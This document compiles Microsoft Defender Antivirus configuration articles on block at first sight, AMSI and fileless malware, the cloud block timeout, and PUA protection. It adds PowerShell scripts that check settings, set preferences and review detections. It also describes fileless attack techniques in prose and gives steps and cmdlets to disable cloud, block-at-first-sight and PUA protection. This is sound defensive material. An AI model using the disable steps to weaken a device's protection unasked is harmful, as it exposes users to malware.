In most enterprise organizations, the settings needed to enable block at first sight are
configured with Microsoft Defender Antivirus deployments. See Turn on cloud
protection in Microsoft Defender Antivirus.

How it works

When Microsoft Defender Antivirus encounters a suspicious but undetected file, it
queries our cloud protection backend. The cloud backend applies heuristics, machine
learning, and automated analysis of the file to determine whether the file is malicious
or not a threat.

Microsoft Defender Antivirus uses multiple detection and prevention technologies to
deliver accurate, intelligent, and real-time protection.

Tip

To learn more, see (Blog) Get to know the advanced technologies at the core of
Microsoft Defender for Endpoint next-generation protection.

A few things to know about block at first sight

Block at first sight can block non-portable executable files (such as JS, VBS, or
macros) and executable files, running the latest Defender antimalware platform on
Windows or Windows Server.

Block at first sight only uses the cloud protection backend for executable files and
non-portable executable files that are downloaded from the Internet, or that
originate from the Internet zone. A hash value of the .exe file is checked via the
cloud backend to determine if the file is a previously undetected file.

If the cloud backend is unable to make a determination, Microsoft Defender
Antivirus locks the file and uploads a copy to the cloud. The cloud performs more
analysis to reach a determination before it either allows the file to run or blocks it
in all future encounters, depending on whether it determines the file to be
malicious or not a threat.

In many cases, this process can reduce the response time for new malware from
hours to seconds.

You can specify how long a file should be prevented from running while the cloud-
based protection service analyzes the file. And, you can customize the message
displayed on users' desktops when a file is blocked. You can change the company
name, contact information, and message URL.

Turn on block at first sight with Microsoft Intune

1. In the Microsoft Intune admin center (https://endpoint.microsoft.com), go to
Endpoint security > Antivirus.

2. Select an existing policy, or create a new policy using the Microsoft Defender
Antivirus profile type. In our example, we selected Windows 10, Windows 11, or
Windows Server for the platform.

3. Set Allow cloud protection to Allowed. This turns on cloud protection.

4. Scroll down to Submit Samples Consent, and select one of the following settings:

Send all samples automatically
Send safe samples automatically

5. Apply the Microsoft Defender Antivirus profile to a group, such as All users, All
devices, or All users and devices.

Turn on block at first sight with Group Policy

Note

We recommend using Intune or Microsoft Configuration Manager to turn on block
at first sight.

1. On your Group Policy management computer, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

2. Using the Group Policy Management Editor go to Computer configuration >
Administrative templates > Windows Components > Microsoft Defender
Antivirus > MAPS.

3. In the MAPS section, double-click Configure the 'Block at First Sight' feature, and
set it to Enabled, and then select OK.

4. In the MAPS section, double-click Send file samples when further analysis is
required, and set it to Enabled. Under Send file samples when further analysis is
required, select Send all samples, and then select OK.

Important

Setting to Always prompt (0) will lower the protection state of the device.
Setting to Never send (2) means block at first sight will not function.

5. Redeploy your Group Policy Object across your network as you usually do.

Confirm block at first sight is enabled on individual client devices

You can confirm that block at first sight is enabled on individual client devices using the
Windows Security app. Block at first sight is automatically enabled as long as Cloud-
delivered protection and Automatic sample submission are both turned on.

1. Open the Windows Security app.

2. Select Virus & threat protection, and then, under Virus & threat protection
settings, select Manage Settings.

3. Confirm that Cloud-delivered protection and Automatic sample submission are
both turned on.

Note

If the prerequisite settings are configured and deployed using Group Policy,
the settings described in this section will be greyed-out and unavailable for
use on individual endpoints.
Changes made through a Group Policy Object must first be deployed to
individual endpoints before the setting will be updated in Windows Settings.
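The following PowerShell script is an added example, not code from the Microsoft article. Instead of the Windows Security app, it reads the same three prerequisites (cloud protection, automatic sample submission, and the explicit block-at-first-sight switch) through the built-in Defender module, using the sample-consent numbering from the Group Policy setting above, and reports whether block at first sight is in effect. The Set-MpPreference remediation it prints is only for devices that are not under Intune or Group Policy control.

```powershell
# Added example (not part of the Microsoft article): verify on a device that the
# settings that make up block at first sight are in effect, and show what to
# change when they are not. Assumes the built-in Defender module; run elevated.

function Test-BlockAtFirstSight {
    $p = Get-MpPreference

    # SubmitSamplesConsent values (same numbering as the Group Policy setting):
    # 0 = Always prompt, 1 = Send safe samples automatically,
    # 2 = Never send, 3 = Send all samples automatically.
    $consentNames = @{ 0 = 'Always prompt'; 1 = 'Send safe samples'; 2 = 'Never send'; 3 = 'Send all samples' }

    $cloudOn    = ($p.MAPSReporting -ne 0)             # 0 = cloud protection disabled
    $samplesOn  = ($p.SubmitSamplesConsent -in 1, 3)   # automatic submission of safe or all samples
    $bafsNotOff = (-not $p.DisableBlockAtFirstSeen)    # the explicit off switch (Group Policy "Disabled")

    [pscustomobject]@{
        CloudProtection         = $cloudOn
        SampleSubmission        = $consentNames[[int]$p.SubmitSamplesConsent]
        AutomaticSampleSending  = $samplesOn
        BlockAtFirstSightSwitch = $bafsNotOff
        Effective               = ($cloudOn -and $samplesOn -and $bafsNotOff)
        # "Up to date" is the third prerequisite; the engine version is shown for comparison.
        EngineVersion           = (Get-MpComputerStatus).AMEngineVersion
    }
}

$state = Test-BlockAtFirstSight
$state | Format-List

if (-not $state.Effective) {
    # Remediation for a device that is not under Intune/Group Policy control.
    # Managed devices get these values from policy; locally set values are
    # overridden by policy (and may be tamper-protected).
    Write-Warning 'Block at first sight is not fully in effect. To enable it locally:'
    Write-Host '  Set-MpPreference -MAPSReporting Advanced -SubmitSamplesConsent SendAllSamples -DisableBlockAtFirstSeen $false'
}
```

When the settings are delivered by Group Policy, the values this script reads are the ones that policy has already applied, so a result of "Never send" here means the Group Policy Object has not yet reached the endpoint or sets the wrong consent value.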

Turn off block at first sight

Caution

Turning off block at first sight will lower the protection state of your device(s) and
your network. We do not recommend disabling block at first sight protection
permanently.

Turn off block at first sight with Microsoft Intune

1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com) and
sign in.

2. Go to Endpoint security > Antivirus, and then select your Microsoft Defender
Antivirus policy.

3. Under Manage, choose Properties.

4. Next to Configuration settings, choose Edit.

5. Set Allow cloud protection to Not allowed. This turns off cloud protection.

6. Review and save your settings.

Turn off block at first sight with Group Policy

1. On your Group Policy management computer, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure, and then select
Edit.

2. Using the Group Policy Management Editor go to Computer configuration and
select Administrative templates.

3. Expand the tree through Windows components > Microsoft Defender Antivirus >
MAPS.

4. Double-click Configure the 'Block at First Sight' feature and set the option to
Disabled.

Note

Disabling block at first sight does not disable or alter the prerequisite group
policies.

Not an enterprise admin or IT Pro?

If you are not an enterprise admin or an IT Pro, but you have questions about block at
first sight, this section is for you. Block at first sight is a threat protection feature that
detects and blocks malware within seconds. Although there isn't a specific setting called
"Block at first sight," the feature is enabled when certain settings are configured on your
device.

How to manage block at first sight on or off on your own device

If you have a personal device that is not managed by an organization, you might be
wondering how to turn block at first sight on or off. You can use the Windows Security
app to manage block at first sight.

1. On your Windows 10 or Windows 11 computer, open the Windows Security app.

2. Select Virus & threat protection.

3. Under Virus & threat protection settings, select Manage settings.

4. Take one of the following steps:

To enable block at first sight, make sure that both Cloud-delivered
protection and Automatic sample submission are turned on.

To disable block at first sight, turn off Cloud-delivered protection or
Automatic sample submission.

Caution

Turning off block at first sight lowers the level of protection for your
device. We do not recommend permanently disabling block at first sight.

See also
Microsoft Defender Antivirus in Windows 10
Enable cloud-delivered protection
Stay protected with Windows Security
Onboard non-Windows devices



Anti-malware Scan Interface (AMSI)
integration with Microsoft Defender
Antivirus
Article • 02/27/2024
Note: AI-assisted content. This article was partially created with the help of AI. An author reviewed and
revised the content as needed.

Applies to:

Microsoft Defender XDR
Microsoft Defender Antivirus
Microsoft Defender for Endpoint P1 & P2
Microsoft Defender for Business
Microsoft Defender for Individuals

Platforms

Windows 10 and newer
Windows Server 2016 and newer

Microsoft Defender for Endpoint uses the Anti-malware Scan Interface (AMSI) to
enhance protection against fileless malware, dynamic script-based attacks, and other
nontraditional cyber threats. This article describes the benefits of AMSI integration, the
types of scripting languages it supports, and how to enable AMSI for improved security.

What is fileless malware?

Fileless malware plays a critical role in modern cyberattacks, using stealthy techniques to
avoid detection. Several major ransomware outbreaks used fileless methods as part of
their kill chains.

Fileless malware uses existing tools that are already present on a compromised device,
such as PowerShell.exe or wmic.exe. Malware can infiltrate a process, executing code
within its memory space and invoking these built-in tools. In this way, attackers
significantly reduce their footprint and evade traditional detection mechanisms.

Because memory is volatile, and fileless malware doesn't place files on disk, establishing
persistence by using fileless malware can be tricky. One example of how fileless malware
achieved persistence was to create a registry run key that launches a “one-liner”
PowerShell cmdlet. This command launched an obfuscated PowerShell script that was
stored in the registry BLOB. The obfuscated PowerShell script contained a reflective
portable executable (PE) loader that loaded a Base64-encoded PE from the registry. The
script stored in the registry ensured the malware persisted.

Attackers use several fileless techniques that can make malware implants stealthy and
evasive. These techniques include:

Reflective DLL injection: Reflective DLL injection involves the manual loading of
malicious DLLs into a process's memory without the need for those DLLs to be on
disk. The malicious DLL can be hosted on a remote attacker-controlled machine
and delivered through a staged network channel (for example, Transport Layer
Security (TLS) protocol), or embedded in obfuscated form inside infection vectors
like macros and scripts. This results in the evasion of the OS mechanism that
monitors and keeps track of loading executable modules. An example of malware
that uses reflective DLL injection is HackTool:Win32/Mikatz!dha.

Memory exploits: Adversaries use fileless memory exploits to run arbitrary code
remotely on victim machines. For example, the UIWIX threat uses the EternalBlue
exploit, which was used by both Petya and WannaCry, to install the DoublePulsar
backdoor, which lives entirely in the kernel's memory (SMB Dispatch Table). Unlike
Petya and WannaCry, UIWIX doesn't drop any files on disk.

Script-based techniques: Scripting languages provide powerful means for
delivering memory-only executable payloads. Script files can embed encoded
shellcode or binaries that they decrypt on the fly at run time and execute via .NET
objects or directly with APIs, without requiring them to be written to disk. The
scripts themselves can be hidden in the registry, read from network streams, or run
manually at the command line by an attacker, without ever touching the disk.

Note

Do not disable PowerShell as a means to block fileless malware. PowerShell is a
powerful and secure management tool and is important for many system and IT
functions. Attackers use malicious PowerShell scripts as a post-exploitation technique,
one that can only take place after an initial compromise has already occurred. Its misuse
is a symptom of an attack that begins with other malicious actions like software
exploitation, social engineering, or credential theft. The key is to prevent an
attacker from getting into the position where they can misuse PowerShell.

WMI persistence: Some attackers use the Windows Management Instrumentation
(WMI) repository to store malicious scripts that are then invoked periodically using
WMI bindings.

Microsoft Defender Antivirus blocks most malware using generic, heuristic, and
behavior-based detections, as well as local and cloud-based machine learning models.
Microsoft Defender Antivirus protects against fileless malware through these
capabilities:

Detecting script-based techniques by using AMSI, which provides the capability to
inspect PowerShell and other script types, even with multiple layers of obfuscation
Detecting and remediating WMI persistence techniques by scanning the WMI
repository, both periodically and whenever anomalous behavior is observed
Detecting reflective DLL injection through enhanced memory scanning techniques
and behavioral monitoring

Why AMSI?
AMSI provides a deeper level of inspection for malicious software that employs
obfuscation and evasion techniques on Windows' built-in scripting hosts. By integrating
AMSI, Microsoft Defender for Endpoint offers extra layers of protection against
advanced threats.

Supported Scripting Languages

PowerShell
JScript
VBScript
Windows Script Host (wscript.exe and cscript.exe)
.NET Framework 4.8 or newer (scanning of all assemblies)
Windows Management Instrumentation (WMI)

If you use Microsoft Office 365, AMSI also supports JavaScript, VBA, and XLM.

AMSI doesn't currently support Python or Perl.

Enabling AMSI

To enable AMSI, you need to enable Script scanning. See Configure scanning options for
Microsoft Defender Antivirus.

Also see Defender Policy CSP - Windows Client Management.
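The following PowerShell script is an added example, not code from the Microsoft article. It confirms on a device that script scanning (the setting AMSI integration depends on) is enabled, and lists the AMSI providers registered with the operating system so that you can see that Microsoft Defender Antivirus is among them. It assumes the built-in Defender module and the standard provider registration path under HKLM\SOFTWARE\Microsoft\AMSI\Providers; the Set-MpPreference hint it prints applies only to devices that policy does not manage.

```powershell
# Added example (not part of the Microsoft article): confirm that script scanning
# is enabled and list the AMSI providers registered on the device, resolving each
# provider CLSID to its display name. Assumes the Defender module and the standard
# AMSI provider registration path (HKLM\SOFTWARE\Microsoft\AMSI\Providers).

function Get-AmsiStatus {
    $pref = Get-MpPreference

    # Providers register a CLSID subkey under this path; the display name of each
    # provider is the default value of its CLSID entry under HKLM\SOFTWARE\Classes\CLSID.
    $providerRoot = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    $providers = @()
    if (Test-Path $providerRoot) {
        foreach ($key in Get-ChildItem -Path $providerRoot) {
            $clsid    = $key.PSChildName
            $clsidKey = "HKLM:\SOFTWARE\Classes\CLSID\$clsid"
            $name = $null
            if (Test-Path $clsidKey) {
                $name = (Get-ItemProperty -Path $clsidKey -ErrorAction SilentlyContinue).'(default)'
            }
            $providers += [pscustomobject]@{ CLSID = $clsid; Name = $name }
        }
    }

    [pscustomobject]@{
        # Defender's AMSI integration is only active while script scanning is not disabled.
        ScriptScanningEnabled = (-not $pref.DisableScriptScanning)
        RealTimeProtection    = (-not $pref.DisableRealtimeMonitoring)
        Providers             = $providers
    }
}

$amsi = Get-AmsiStatus
$amsi | Format-List ScriptScanningEnabled, RealTimeProtection
$amsi.Providers | Format-Table -AutoSize

if (-not $amsi.ScriptScanningEnabled) {
    Write-Warning 'Script scanning is disabled; AMSI-based detection of PowerShell, JScript and VBScript content is off.'
    Write-Host 'On an unmanaged device: Set-MpPreference -DisableScriptScanning $false'
}
```

An empty provider list or a Defender entry with no display name points at a broken registration rather than a policy problem, and is worth checking before assuming that turning script scanning on is enough.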

AMSI resources

Anti-malware Scan Interface (AMSI) APIs are available for developers and antivirus
vendors to implement.

Other Microsoft products such as Exchange and SharePoint also use AMSI
integration.

More resources to protect against fileless attacks

Windows Defender Application Control and AppLocker: Enforce strong code
integrity policies that allow only trusted applications to run. In the context of
fileless malware, WDAC locks down PowerShell to Constrained Language Mode,
which limits the extended language features that can lead to unverifiable code
execution, such as direct .NET scripting, invocation of Win32 APIs via the Add-Type
cmdlet, and interaction with COM objects. This essentially mitigates PowerShell-
based reflective DLL injection attacks.

Attack surface reduction helps admins protect against common attack vectors.

Enable virtualization-based protection of code integrity: Mitigates kernel-memory
exploits through Hypervisor Code Integrity (HVCI), which makes it difficult to inject
malicious code using kernel-mode software vulnerabilities.



Configure the cloud block timeout
period
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

When Microsoft Defender Antivirus finds a suspicious file, it can prevent the file from
running while it queries the Microsoft Defender Antivirus cloud service.

The default period that the file is blocked is 10 seconds. If you're a security
administrator, you can specify more time to wait before the file is allowed to run.
Extending the cloud block timeout period can help ensure there is enough time to
receive a proper determination from the Microsoft Defender Antivirus cloud service.

Prerequisites to use the extended cloud block timeout

Block at first sight and its prerequisites must be enabled before you can specify an
extended timeout period.

Specify the extended timeout period using Microsoft Intune

You can specify the cloud block timeout period with an endpoint security policy in
Microsoft Intune.

1. Go to the Intune admin center (https://endpoint.microsoft.com/ ) and sign in.

2. Select Endpoint security, and then under Manage, choose Antivirus.

3. Select (or create) an antivirus policy.

4. In the Configuration settings section, expand Cloud protection. Then, in the
Microsoft Defender Antivirus Extended Timeout In Seconds box, specify the additional
time, in seconds, from 1 second to 50 seconds. Whatever you specify is added to
the default 10 seconds.

5. (This step is optional) Make any other changes to your antivirus policy. (Need help?
See Settings for Microsoft Defender Antivirus policy in Microsoft Intune.)

6. Choose Next, and finish configuring your policy.

Specify the extended timeout period using Group Policy

You can use Group Policy to specify an extended timeout for cloud checks.

1. On your Group Policy management computer, open the Group Policy Management
Console.

2. Right-click the Group Policy Object you want to configure and then select Edit.

3. In the Group Policy Management Editor, go to Computer configuration, and then
select Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
MpEngine.

5. Double-click Configure extended cloud check and ensure the option is enabled.

Specify the extra amount of time to prevent the file from running while waiting for
a cloud determination. Specify the extra time, in seconds, from 1 second to 50
seconds. Whatever you specify is added to the default 10 seconds.

6. Select OK.
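The following PowerShell script is an added example, not code from the Microsoft article. It applies the same setting as the Intune and Group Policy steps above on a single device through the built-in Defender module (the CloudExtendedTimeout preference), enforces the 1 to 50 second range from the article, refuses to proceed when block at first sight is not in effect, and reports the resulting total block window (the default 10 seconds plus the extra time). It assumes an elevated session on a device that Intune or Group Policy does not already control; on a managed device the policy value wins.

```powershell
# Added example (not part of the Microsoft article): set the extended cloud block
# timeout on a device and show the resulting total block window. Assumes the
# Defender module (Get-/Set-MpPreference with the CloudExtendedTimeout setting)
# and an elevated session on a device not under Intune/Group Policy control.

$DefaultCloudBlockSeconds = 10   # base period quoted in the article

function Set-CloudBlockTimeout {
    param(
        # Extra seconds added on top of the default 10; the article allows 1 to 50.
        [ValidateRange(1, 50)]
        [int]$ExtraSeconds
    )

    $before = Get-MpPreference

    # Block at first sight must be in effect for the extended timeout to matter:
    # cloud protection on (MAPSReporting != 0) and the explicit switch not disabled.
    $bafsOn = (-not $before.DisableBlockAtFirstSeen) -and ($before.MAPSReporting -ne 0)
    if (-not $bafsOn) {
        throw 'Block at first sight (cloud protection) is not enabled; enable it before extending the timeout.'
    }

    Set-MpPreference -CloudExtendedTimeout $ExtraSeconds

    $after = Get-MpPreference
    [pscustomobject]@{
        PreviousExtraSeconds = $before.CloudExtendedTimeout
        ExtraSeconds         = $after.CloudExtendedTimeout
        TotalBlockSeconds    = $DefaultCloudBlockSeconds + $after.CloudExtendedTimeout
        CloudBlockLevel      = $after.CloudBlockLevel
    }
}

# Usage: hold suspicious files for a total of 10 + 20 = 30 seconds while the cloud decides.
Set-CloudBlockTimeout -ExtraSeconds 20 | Format-List
```

If ExtraSeconds reads back unchanged after the call, the value is being supplied by policy (or is tamper-protected), which is the expected outcome on a managed device.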

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features



Configure behavioral, heuristic, and
real-time protection
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Microsoft Defender Antivirus uses several methods to provide threat protection:

Cloud protection for near-instant detection and blocking of new and emerging
threats
Always-on scanning, using file and process behavior monitoring and other
heuristics (also known as "real-time protection")
Dedicated protection updates based on machine learning, human and automated
big-data analysis, and in-depth threat resistance research

You can configure how Microsoft Defender Antivirus uses these methods with Microsoft
Defender for Endpoint Security Configuration Management, Microsoft Intune, Microsoft
Configuration Manager, Group Policy, PowerShell cmdlets, and Windows Management
Instrumentation (WMI).

This section covers configuration for always-on scanning, including how to detect and
block apps that are deemed unsafe, but may not be detected as malware.

See Use next-gen Microsoft Defender Antivirus technologies through cloud protection
for how to enable and configure Microsoft Defender Antivirus cloud protection.

In this section

Topic: Detect and block potentially unwanted applications
Description: Detect and block apps that may be unwanted in your network, such as
adware, browser modifiers and toolbars, and rogue or fake antivirus apps

Topic: Enable and configure Microsoft Defender Antivirus protection capabilities
Description: Enable and configure real-time protection, heuristics, and other always-on
Microsoft Defender Antivirus monitoring features

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

See also
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus



Detect and block potentially unwanted
applications
Article • 08/28/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Edge
Microsoft Defender Antivirus

Platforms

Windows

Potentially unwanted applications (PUA) are a category of software that can cause your
machine to run slowly, display unexpected ads, or at worst, install other software that
might be unexpected or unwanted. PUA isn't considered a virus, malware, or other type
of threat, but it might perform actions on endpoints that adversely affect endpoint
performance or use. The term PUA can also refer to an application that has a poor
reputation, as assessed by Microsoft Defender for Endpoint, due to certain kinds of
undesirable behavior.

Here are some examples:

Advertising software: software that displays advertisements or promotions, including
software that inserts advertisements into webpages.
Bundling software: software that offers to install other software that isn't digitally
signed by the same entity, or that offers to install other software that qualifies as
PUA.
Evasion software: software that actively tries to evade detection by security products,
including software that behaves differently in the presence of security products.

Tip

For more examples and a discussion of the criteria we use to label applications for
special attention from security features, see How Microsoft identifies malware and
potentially unwanted applications.

Potentially unwanted applications can increase the risk of your network being infected
with actual malware, make malware infections harder to identify, or cost your IT and
security teams time and effort to clean them up. PUA protection is supported on
Windows 11, Windows 10, Windows Server 2022, Windows Server 2019, and Windows
Server 2016. If your organization's subscription includes Microsoft Defender for
Endpoint, Microsoft Defender Antivirus blocks apps that are considered to be PUA by
default on Windows devices.

Learn more about Windows Enterprise subscriptions.

Microsoft Edge
The new Microsoft Edge, which is Chromium-based, blocks potentially unwanted application downloads and associated resource URLs. This feature is provided via Microsoft Defender SmartScreen.

Enable PUA protection in Chromium-based Microsoft Edge
Although potentially unwanted application protection in Microsoft Edge (Chromium-based, version 80.0.361.50) is turned off by default, it can easily be turned on from within the browser.

1. In your Microsoft Edge browser, select the ellipses, and then choose Settings.

2. Select Privacy, search, and services.

3. Under the Security section, turn on Block potentially unwanted apps.

Tip

If you are running Microsoft Edge (Chromium-based), you can safely explore the URL-blocking feature of PUA protection by testing it out on one of our Microsoft Defender SmartScreen demo pages.

Block URLs with Microsoft Defender SmartScreen
In Chromium-based Microsoft Edge with PUA protection turned on, Microsoft Defender SmartScreen protects you from PUA-associated URLs.

Security admins can configure how Microsoft Edge and Microsoft Defender SmartScreen
work together to protect groups of users from PUA-associated URLs. There are several
group policy settings explicitly for Microsoft Defender SmartScreen available, including
one for blocking PUA. In addition, admins can configure Microsoft Defender
SmartScreen as a whole, using group policy settings to turn Microsoft Defender
SmartScreen on or off.

Although Microsoft Defender for Endpoint has its own blocklist based upon a data set
managed by Microsoft, you can customize this list based on your own threat
intelligence. If you create and manage indicators in the Microsoft Defender for Endpoint
portal, Microsoft Defender SmartScreen respects the new settings.

Microsoft Defender Antivirus and PUA protection
The potentially unwanted application (PUA) protection feature in Microsoft Defender Antivirus can detect and block PUA on endpoints in your network.

Note

This feature is available in Windows 11, Windows 10, Windows Server 2022, Windows Server 2019, and Windows Server 2016.

Microsoft Defender Antivirus blocks detected PUA files and any attempts to download, move, run, or install them. Blocked PUA files are then moved to quarantine. When a PUA file is detected on an endpoint, Microsoft Defender Antivirus sends a notification to the user (unless notifications have been disabled) in the same format as other threat detections. The notification is prefaced with PUA: to indicate its content.

The notification appears in the usual quarantine list within the Windows Security app.

Configure PUA protection in Microsoft Defender Antivirus
You can enable PUA protection with Microsoft Intune, Microsoft Configuration Manager, Group Policy, or via PowerShell cmdlets.

At first, try using PUA protection in audit mode. It detects potentially unwanted applications without actually blocking them. Detections are captured in the Windows Event log. PUA protection in audit mode is useful if your company is conducting an internal software security compliance check and it's important to avoid false positives.

Use Intune to configure PUA protection
See the following articles:

- Configure device restriction settings in Microsoft Intune
- Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune

Use Configuration Manager to configure PUA protection
PUA protection is enabled by default in the Microsoft Configuration Manager (Current Branch).

See How to create and deploy antimalware policies: Scheduled scans settings for details
on configuring Microsoft Configuration Manager (Current Branch).

For System Center 2012 Configuration Manager, see How to Deploy Potentially
Unwanted Application Protection Policy for Endpoint Protection in Configuration
Manager.

Note

PUA events blocked by Microsoft Defender Antivirus are reported in the Windows Event Viewer and not in Microsoft Configuration Manager.

Use Group Policy to configure PUA protection
1. Download and install Administrative Templates (.admx) for Windows 11 October 2021 Update (21H2).

2. On your Group Policy management computer, open the Group Policy Management Console.

3. Select the Group Policy Object you want to configure, and then choose Edit.

4. In the Group Policy Management Editor, go to Computer configuration and select Administrative templates.

5. Expand the tree to Windows Components > Microsoft Defender Antivirus.

6. Double-click Configure detection for potentially unwanted applications.

7. Select Enabled to enable PUA protection.

8. In Options, select Block to block potentially unwanted applications, or select Audit Mode to test how the setting works in your environment. Select OK.

9. Deploy your Group Policy object as you usually do.

Use PowerShell cmdlets to configure PUA protection

To enable PUA protection

PowerShell

Set-MpPreference -PUAProtection Enabled

Setting the value for this cmdlet to Enabled turns on the feature if it has been disabled.

To set PUA protection to audit mode

PowerShell

Set-MpPreference -PUAProtection AuditMode

Setting AuditMode detects PUAs without blocking them.

To disable PUA protection

We recommend keeping PUA protection turned on. However, you can turn it off by using the following cmdlet:

PowerShell

Set-MpPreference -PUAProtection Disabled

Setting the value for this cmdlet to Disabled turns off the feature if it has been enabled.

For more information, see Use PowerShell cmdlets to configure and run Microsoft
Defender Antivirus and Defender Antivirus cmdlets.

View PUA events using PowerShell
PUA events are reported in the Windows Event Viewer, but not in Microsoft Configuration Manager or in Intune. You can also use the Get-MpThreat cmdlet to view threats that Microsoft Defender Antivirus handled. Here's an example:

Console

CategoryID : 27
DidThreatExecute : False
IsActive : False
Resources : {webfile:_q:\Builds\Dalton_Download_Manager_3223905758.exe|http://d18yzm5yb8map8.cloudfront.net/fo4yue@kxqdw/Dalton_Download_Manager.exe|pid:14196,ProcessStart:132378130057195714}
RollupStatus : 33
SchemaVersion : 1.0.0.0
SeverityID : 1
ThreatID : 213927
ThreatName : PUA:Win32/InstallCore
TypeID : 0
PSComputerName :

Get email notifications about PUA detections
You can turn on email notifications to receive mail about PUA detections.

See Troubleshoot event IDs for details on viewing Microsoft Defender Antivirus events. PUA events are recorded under event ID 1160.
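
The audit-mode cmdlet, the Get-MpThreat listing, and event ID 1160 from the sections above, combined into one added script (this is an added example, not code from the Microsoft article). It assumes an elevated PowerShell session on Windows with Microsoft Defender Antivirus active; the Get-PuaProtectionState helper, the seven-day lookback, and the numeric mode mapping are this example's own assumptions.

```powershell
# Added example, not part of the Microsoft article. Puts PUA protection into
# audit mode, confirms the setting, and reviews what has been recorded so far.
# Assumes an elevated PowerShell session on Windows with Microsoft Defender
# Antivirus active.

# Get-MpPreference reports PUAProtection as a number (assumed mapping:
# 0 = Disabled, 1 = Enabled, 2 = AuditMode), so translate it for the report.
$puaModeNames = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode' }

function Get-PuaProtectionState {
    # Hypothetical helper for this example: returns the current mode by name.
    $value = [int](Get-MpPreference).PUAProtection
    if ($puaModeNames.ContainsKey($value)) { return $puaModeNames[$value] }
    return "Unknown($value)"
}

# 1. Start in audit mode, as the article suggests: detections are logged
#    but nothing is blocked while you review the results.
Set-MpPreference -PUAProtection AuditMode
"PUA protection mode: $(Get-PuaProtectionState)"

# 2. List the PUA detections the engine has handled. PUA threat names carry
#    the 'PUA:' prefix, as in the article's Get-MpThreat sample.
Get-MpThreat |
    Where-Object { $_.ThreatName -like 'PUA:*' } |
    Select-Object ThreatName, ThreatID, SeverityID, IsActive, DidThreatExecute,
        @{ Name = 'Resources'; Expression = { $_.Resources -join '; ' } } |
    Format-Table -AutoSize

# 3. Pull event ID 1160 (PUA detected) from the Defender operational log for
#    the last seven days. In audit mode this log is the record of what would
#    have been blocked.
$filter = @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 1160
    StartTime = (Get-Date).AddDays(-7)
}
$events = @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)
"PUA events (ID 1160) in the last 7 days: $($events.Count)"
$events |
    Select-Object TimeCreated,
        @{ Name = 'Summary'; Expression = { ($_.Message -split "`r?`n")[0] } } |
    Format-Table -AutoSize -Wrap

# 4. When the audit period is over and the results are acceptable, switch to
#    blocking. Left commented out so re-running this script keeps audit mode.
# Set-MpPreference -PUAProtection Enabled
```
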

View PUA events using advanced hunting
If you're using Microsoft Defender for Endpoint, you can use an advanced hunting query to view PUA events. Here's an example query:

Kusto

DeviceEvents
| where ActionType == "AntivirusDetection"
| extend x = parse_json(AdditionalFields)
| project Timestamp, DeviceName, FolderPath, FileName, SHA256,
    ThreatName = tostring(x.ThreatName),
    WasExecutingWhileDetected = tostring(x.WasExecutingWhileDetected),
    WasRemediated = tostring(x.WasRemediated)
| where ThreatName startswith_cs 'PUA:'

To learn more about advanced hunting, see Proactively hunt for threats with advanced hunting.

Exclude files from PUA protection
Sometimes a file is erroneously blocked by PUA protection, or a feature of a PUA is required to complete a task. In these cases, a file can be added to an exclusion list.

For more information, see Configure and validate exclusions based on file extension and folder location.

Tip

If you're looking for antivirus-related information for other platforms, see:

- Set preferences for Microsoft Defender for Endpoint on macOS
- Microsoft Defender for Endpoint on Mac
- macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
- Set preferences for Microsoft Defender for Endpoint on Linux
- Microsoft Defender for Endpoint on Linux
- Configure Defender for Endpoint on Android features
- Configure Microsoft Defender for Endpoint on iOS features

See also
Next-generation protection
Configure behavioral, heuristic, and real-time protection
Enable and configure Microsoft Defender Antivirus always-on protection
Article • 05/25/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender Antivirus

Platforms

Windows

Always-on protection consists of real-time protection, behavior monitoring, and heuristics to identify malware based on known suspicious and malicious activities. These activities include events, such as processes making unusual changes to existing files, modifying or creating automatic startup registry keys and startup locations (also known as autostart extensibility points, or ASEPs), and other changes to the file system or file structure. Always-on protection is an important part of your antivirus protection and should be enabled.

Note

Tamper protection helps keep always-on protection and other security settings from being changed. As a result, when tamper protection is enabled, any changes made to tamper-protected settings are ignored. If you must make changes to a device and those changes are blocked by tamper protection, we recommend using troubleshooting mode to temporarily disable tamper protection on the device. Note that after troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.

Manage antivirus settings with Microsoft Intune
You can use Intune to configure antivirus policies, and then apply those policies across
devices in your organization. Antivirus policies help security admins focus on managing
the discrete group of antivirus settings for managed devices. Each antivirus policy
includes several profiles. Each profile contains only the settings that are relevant for
Microsoft Defender Antivirus for macOS and Windows devices, or for the user
experience in the Windows Security app on Windows devices. For more information, see
Antivirus policy for endpoint security in Intune.

1. Go to the Intune admin center and sign in.

2. In the navigation pane, choose Endpoint security and then, under Manage, choose
Antivirus.

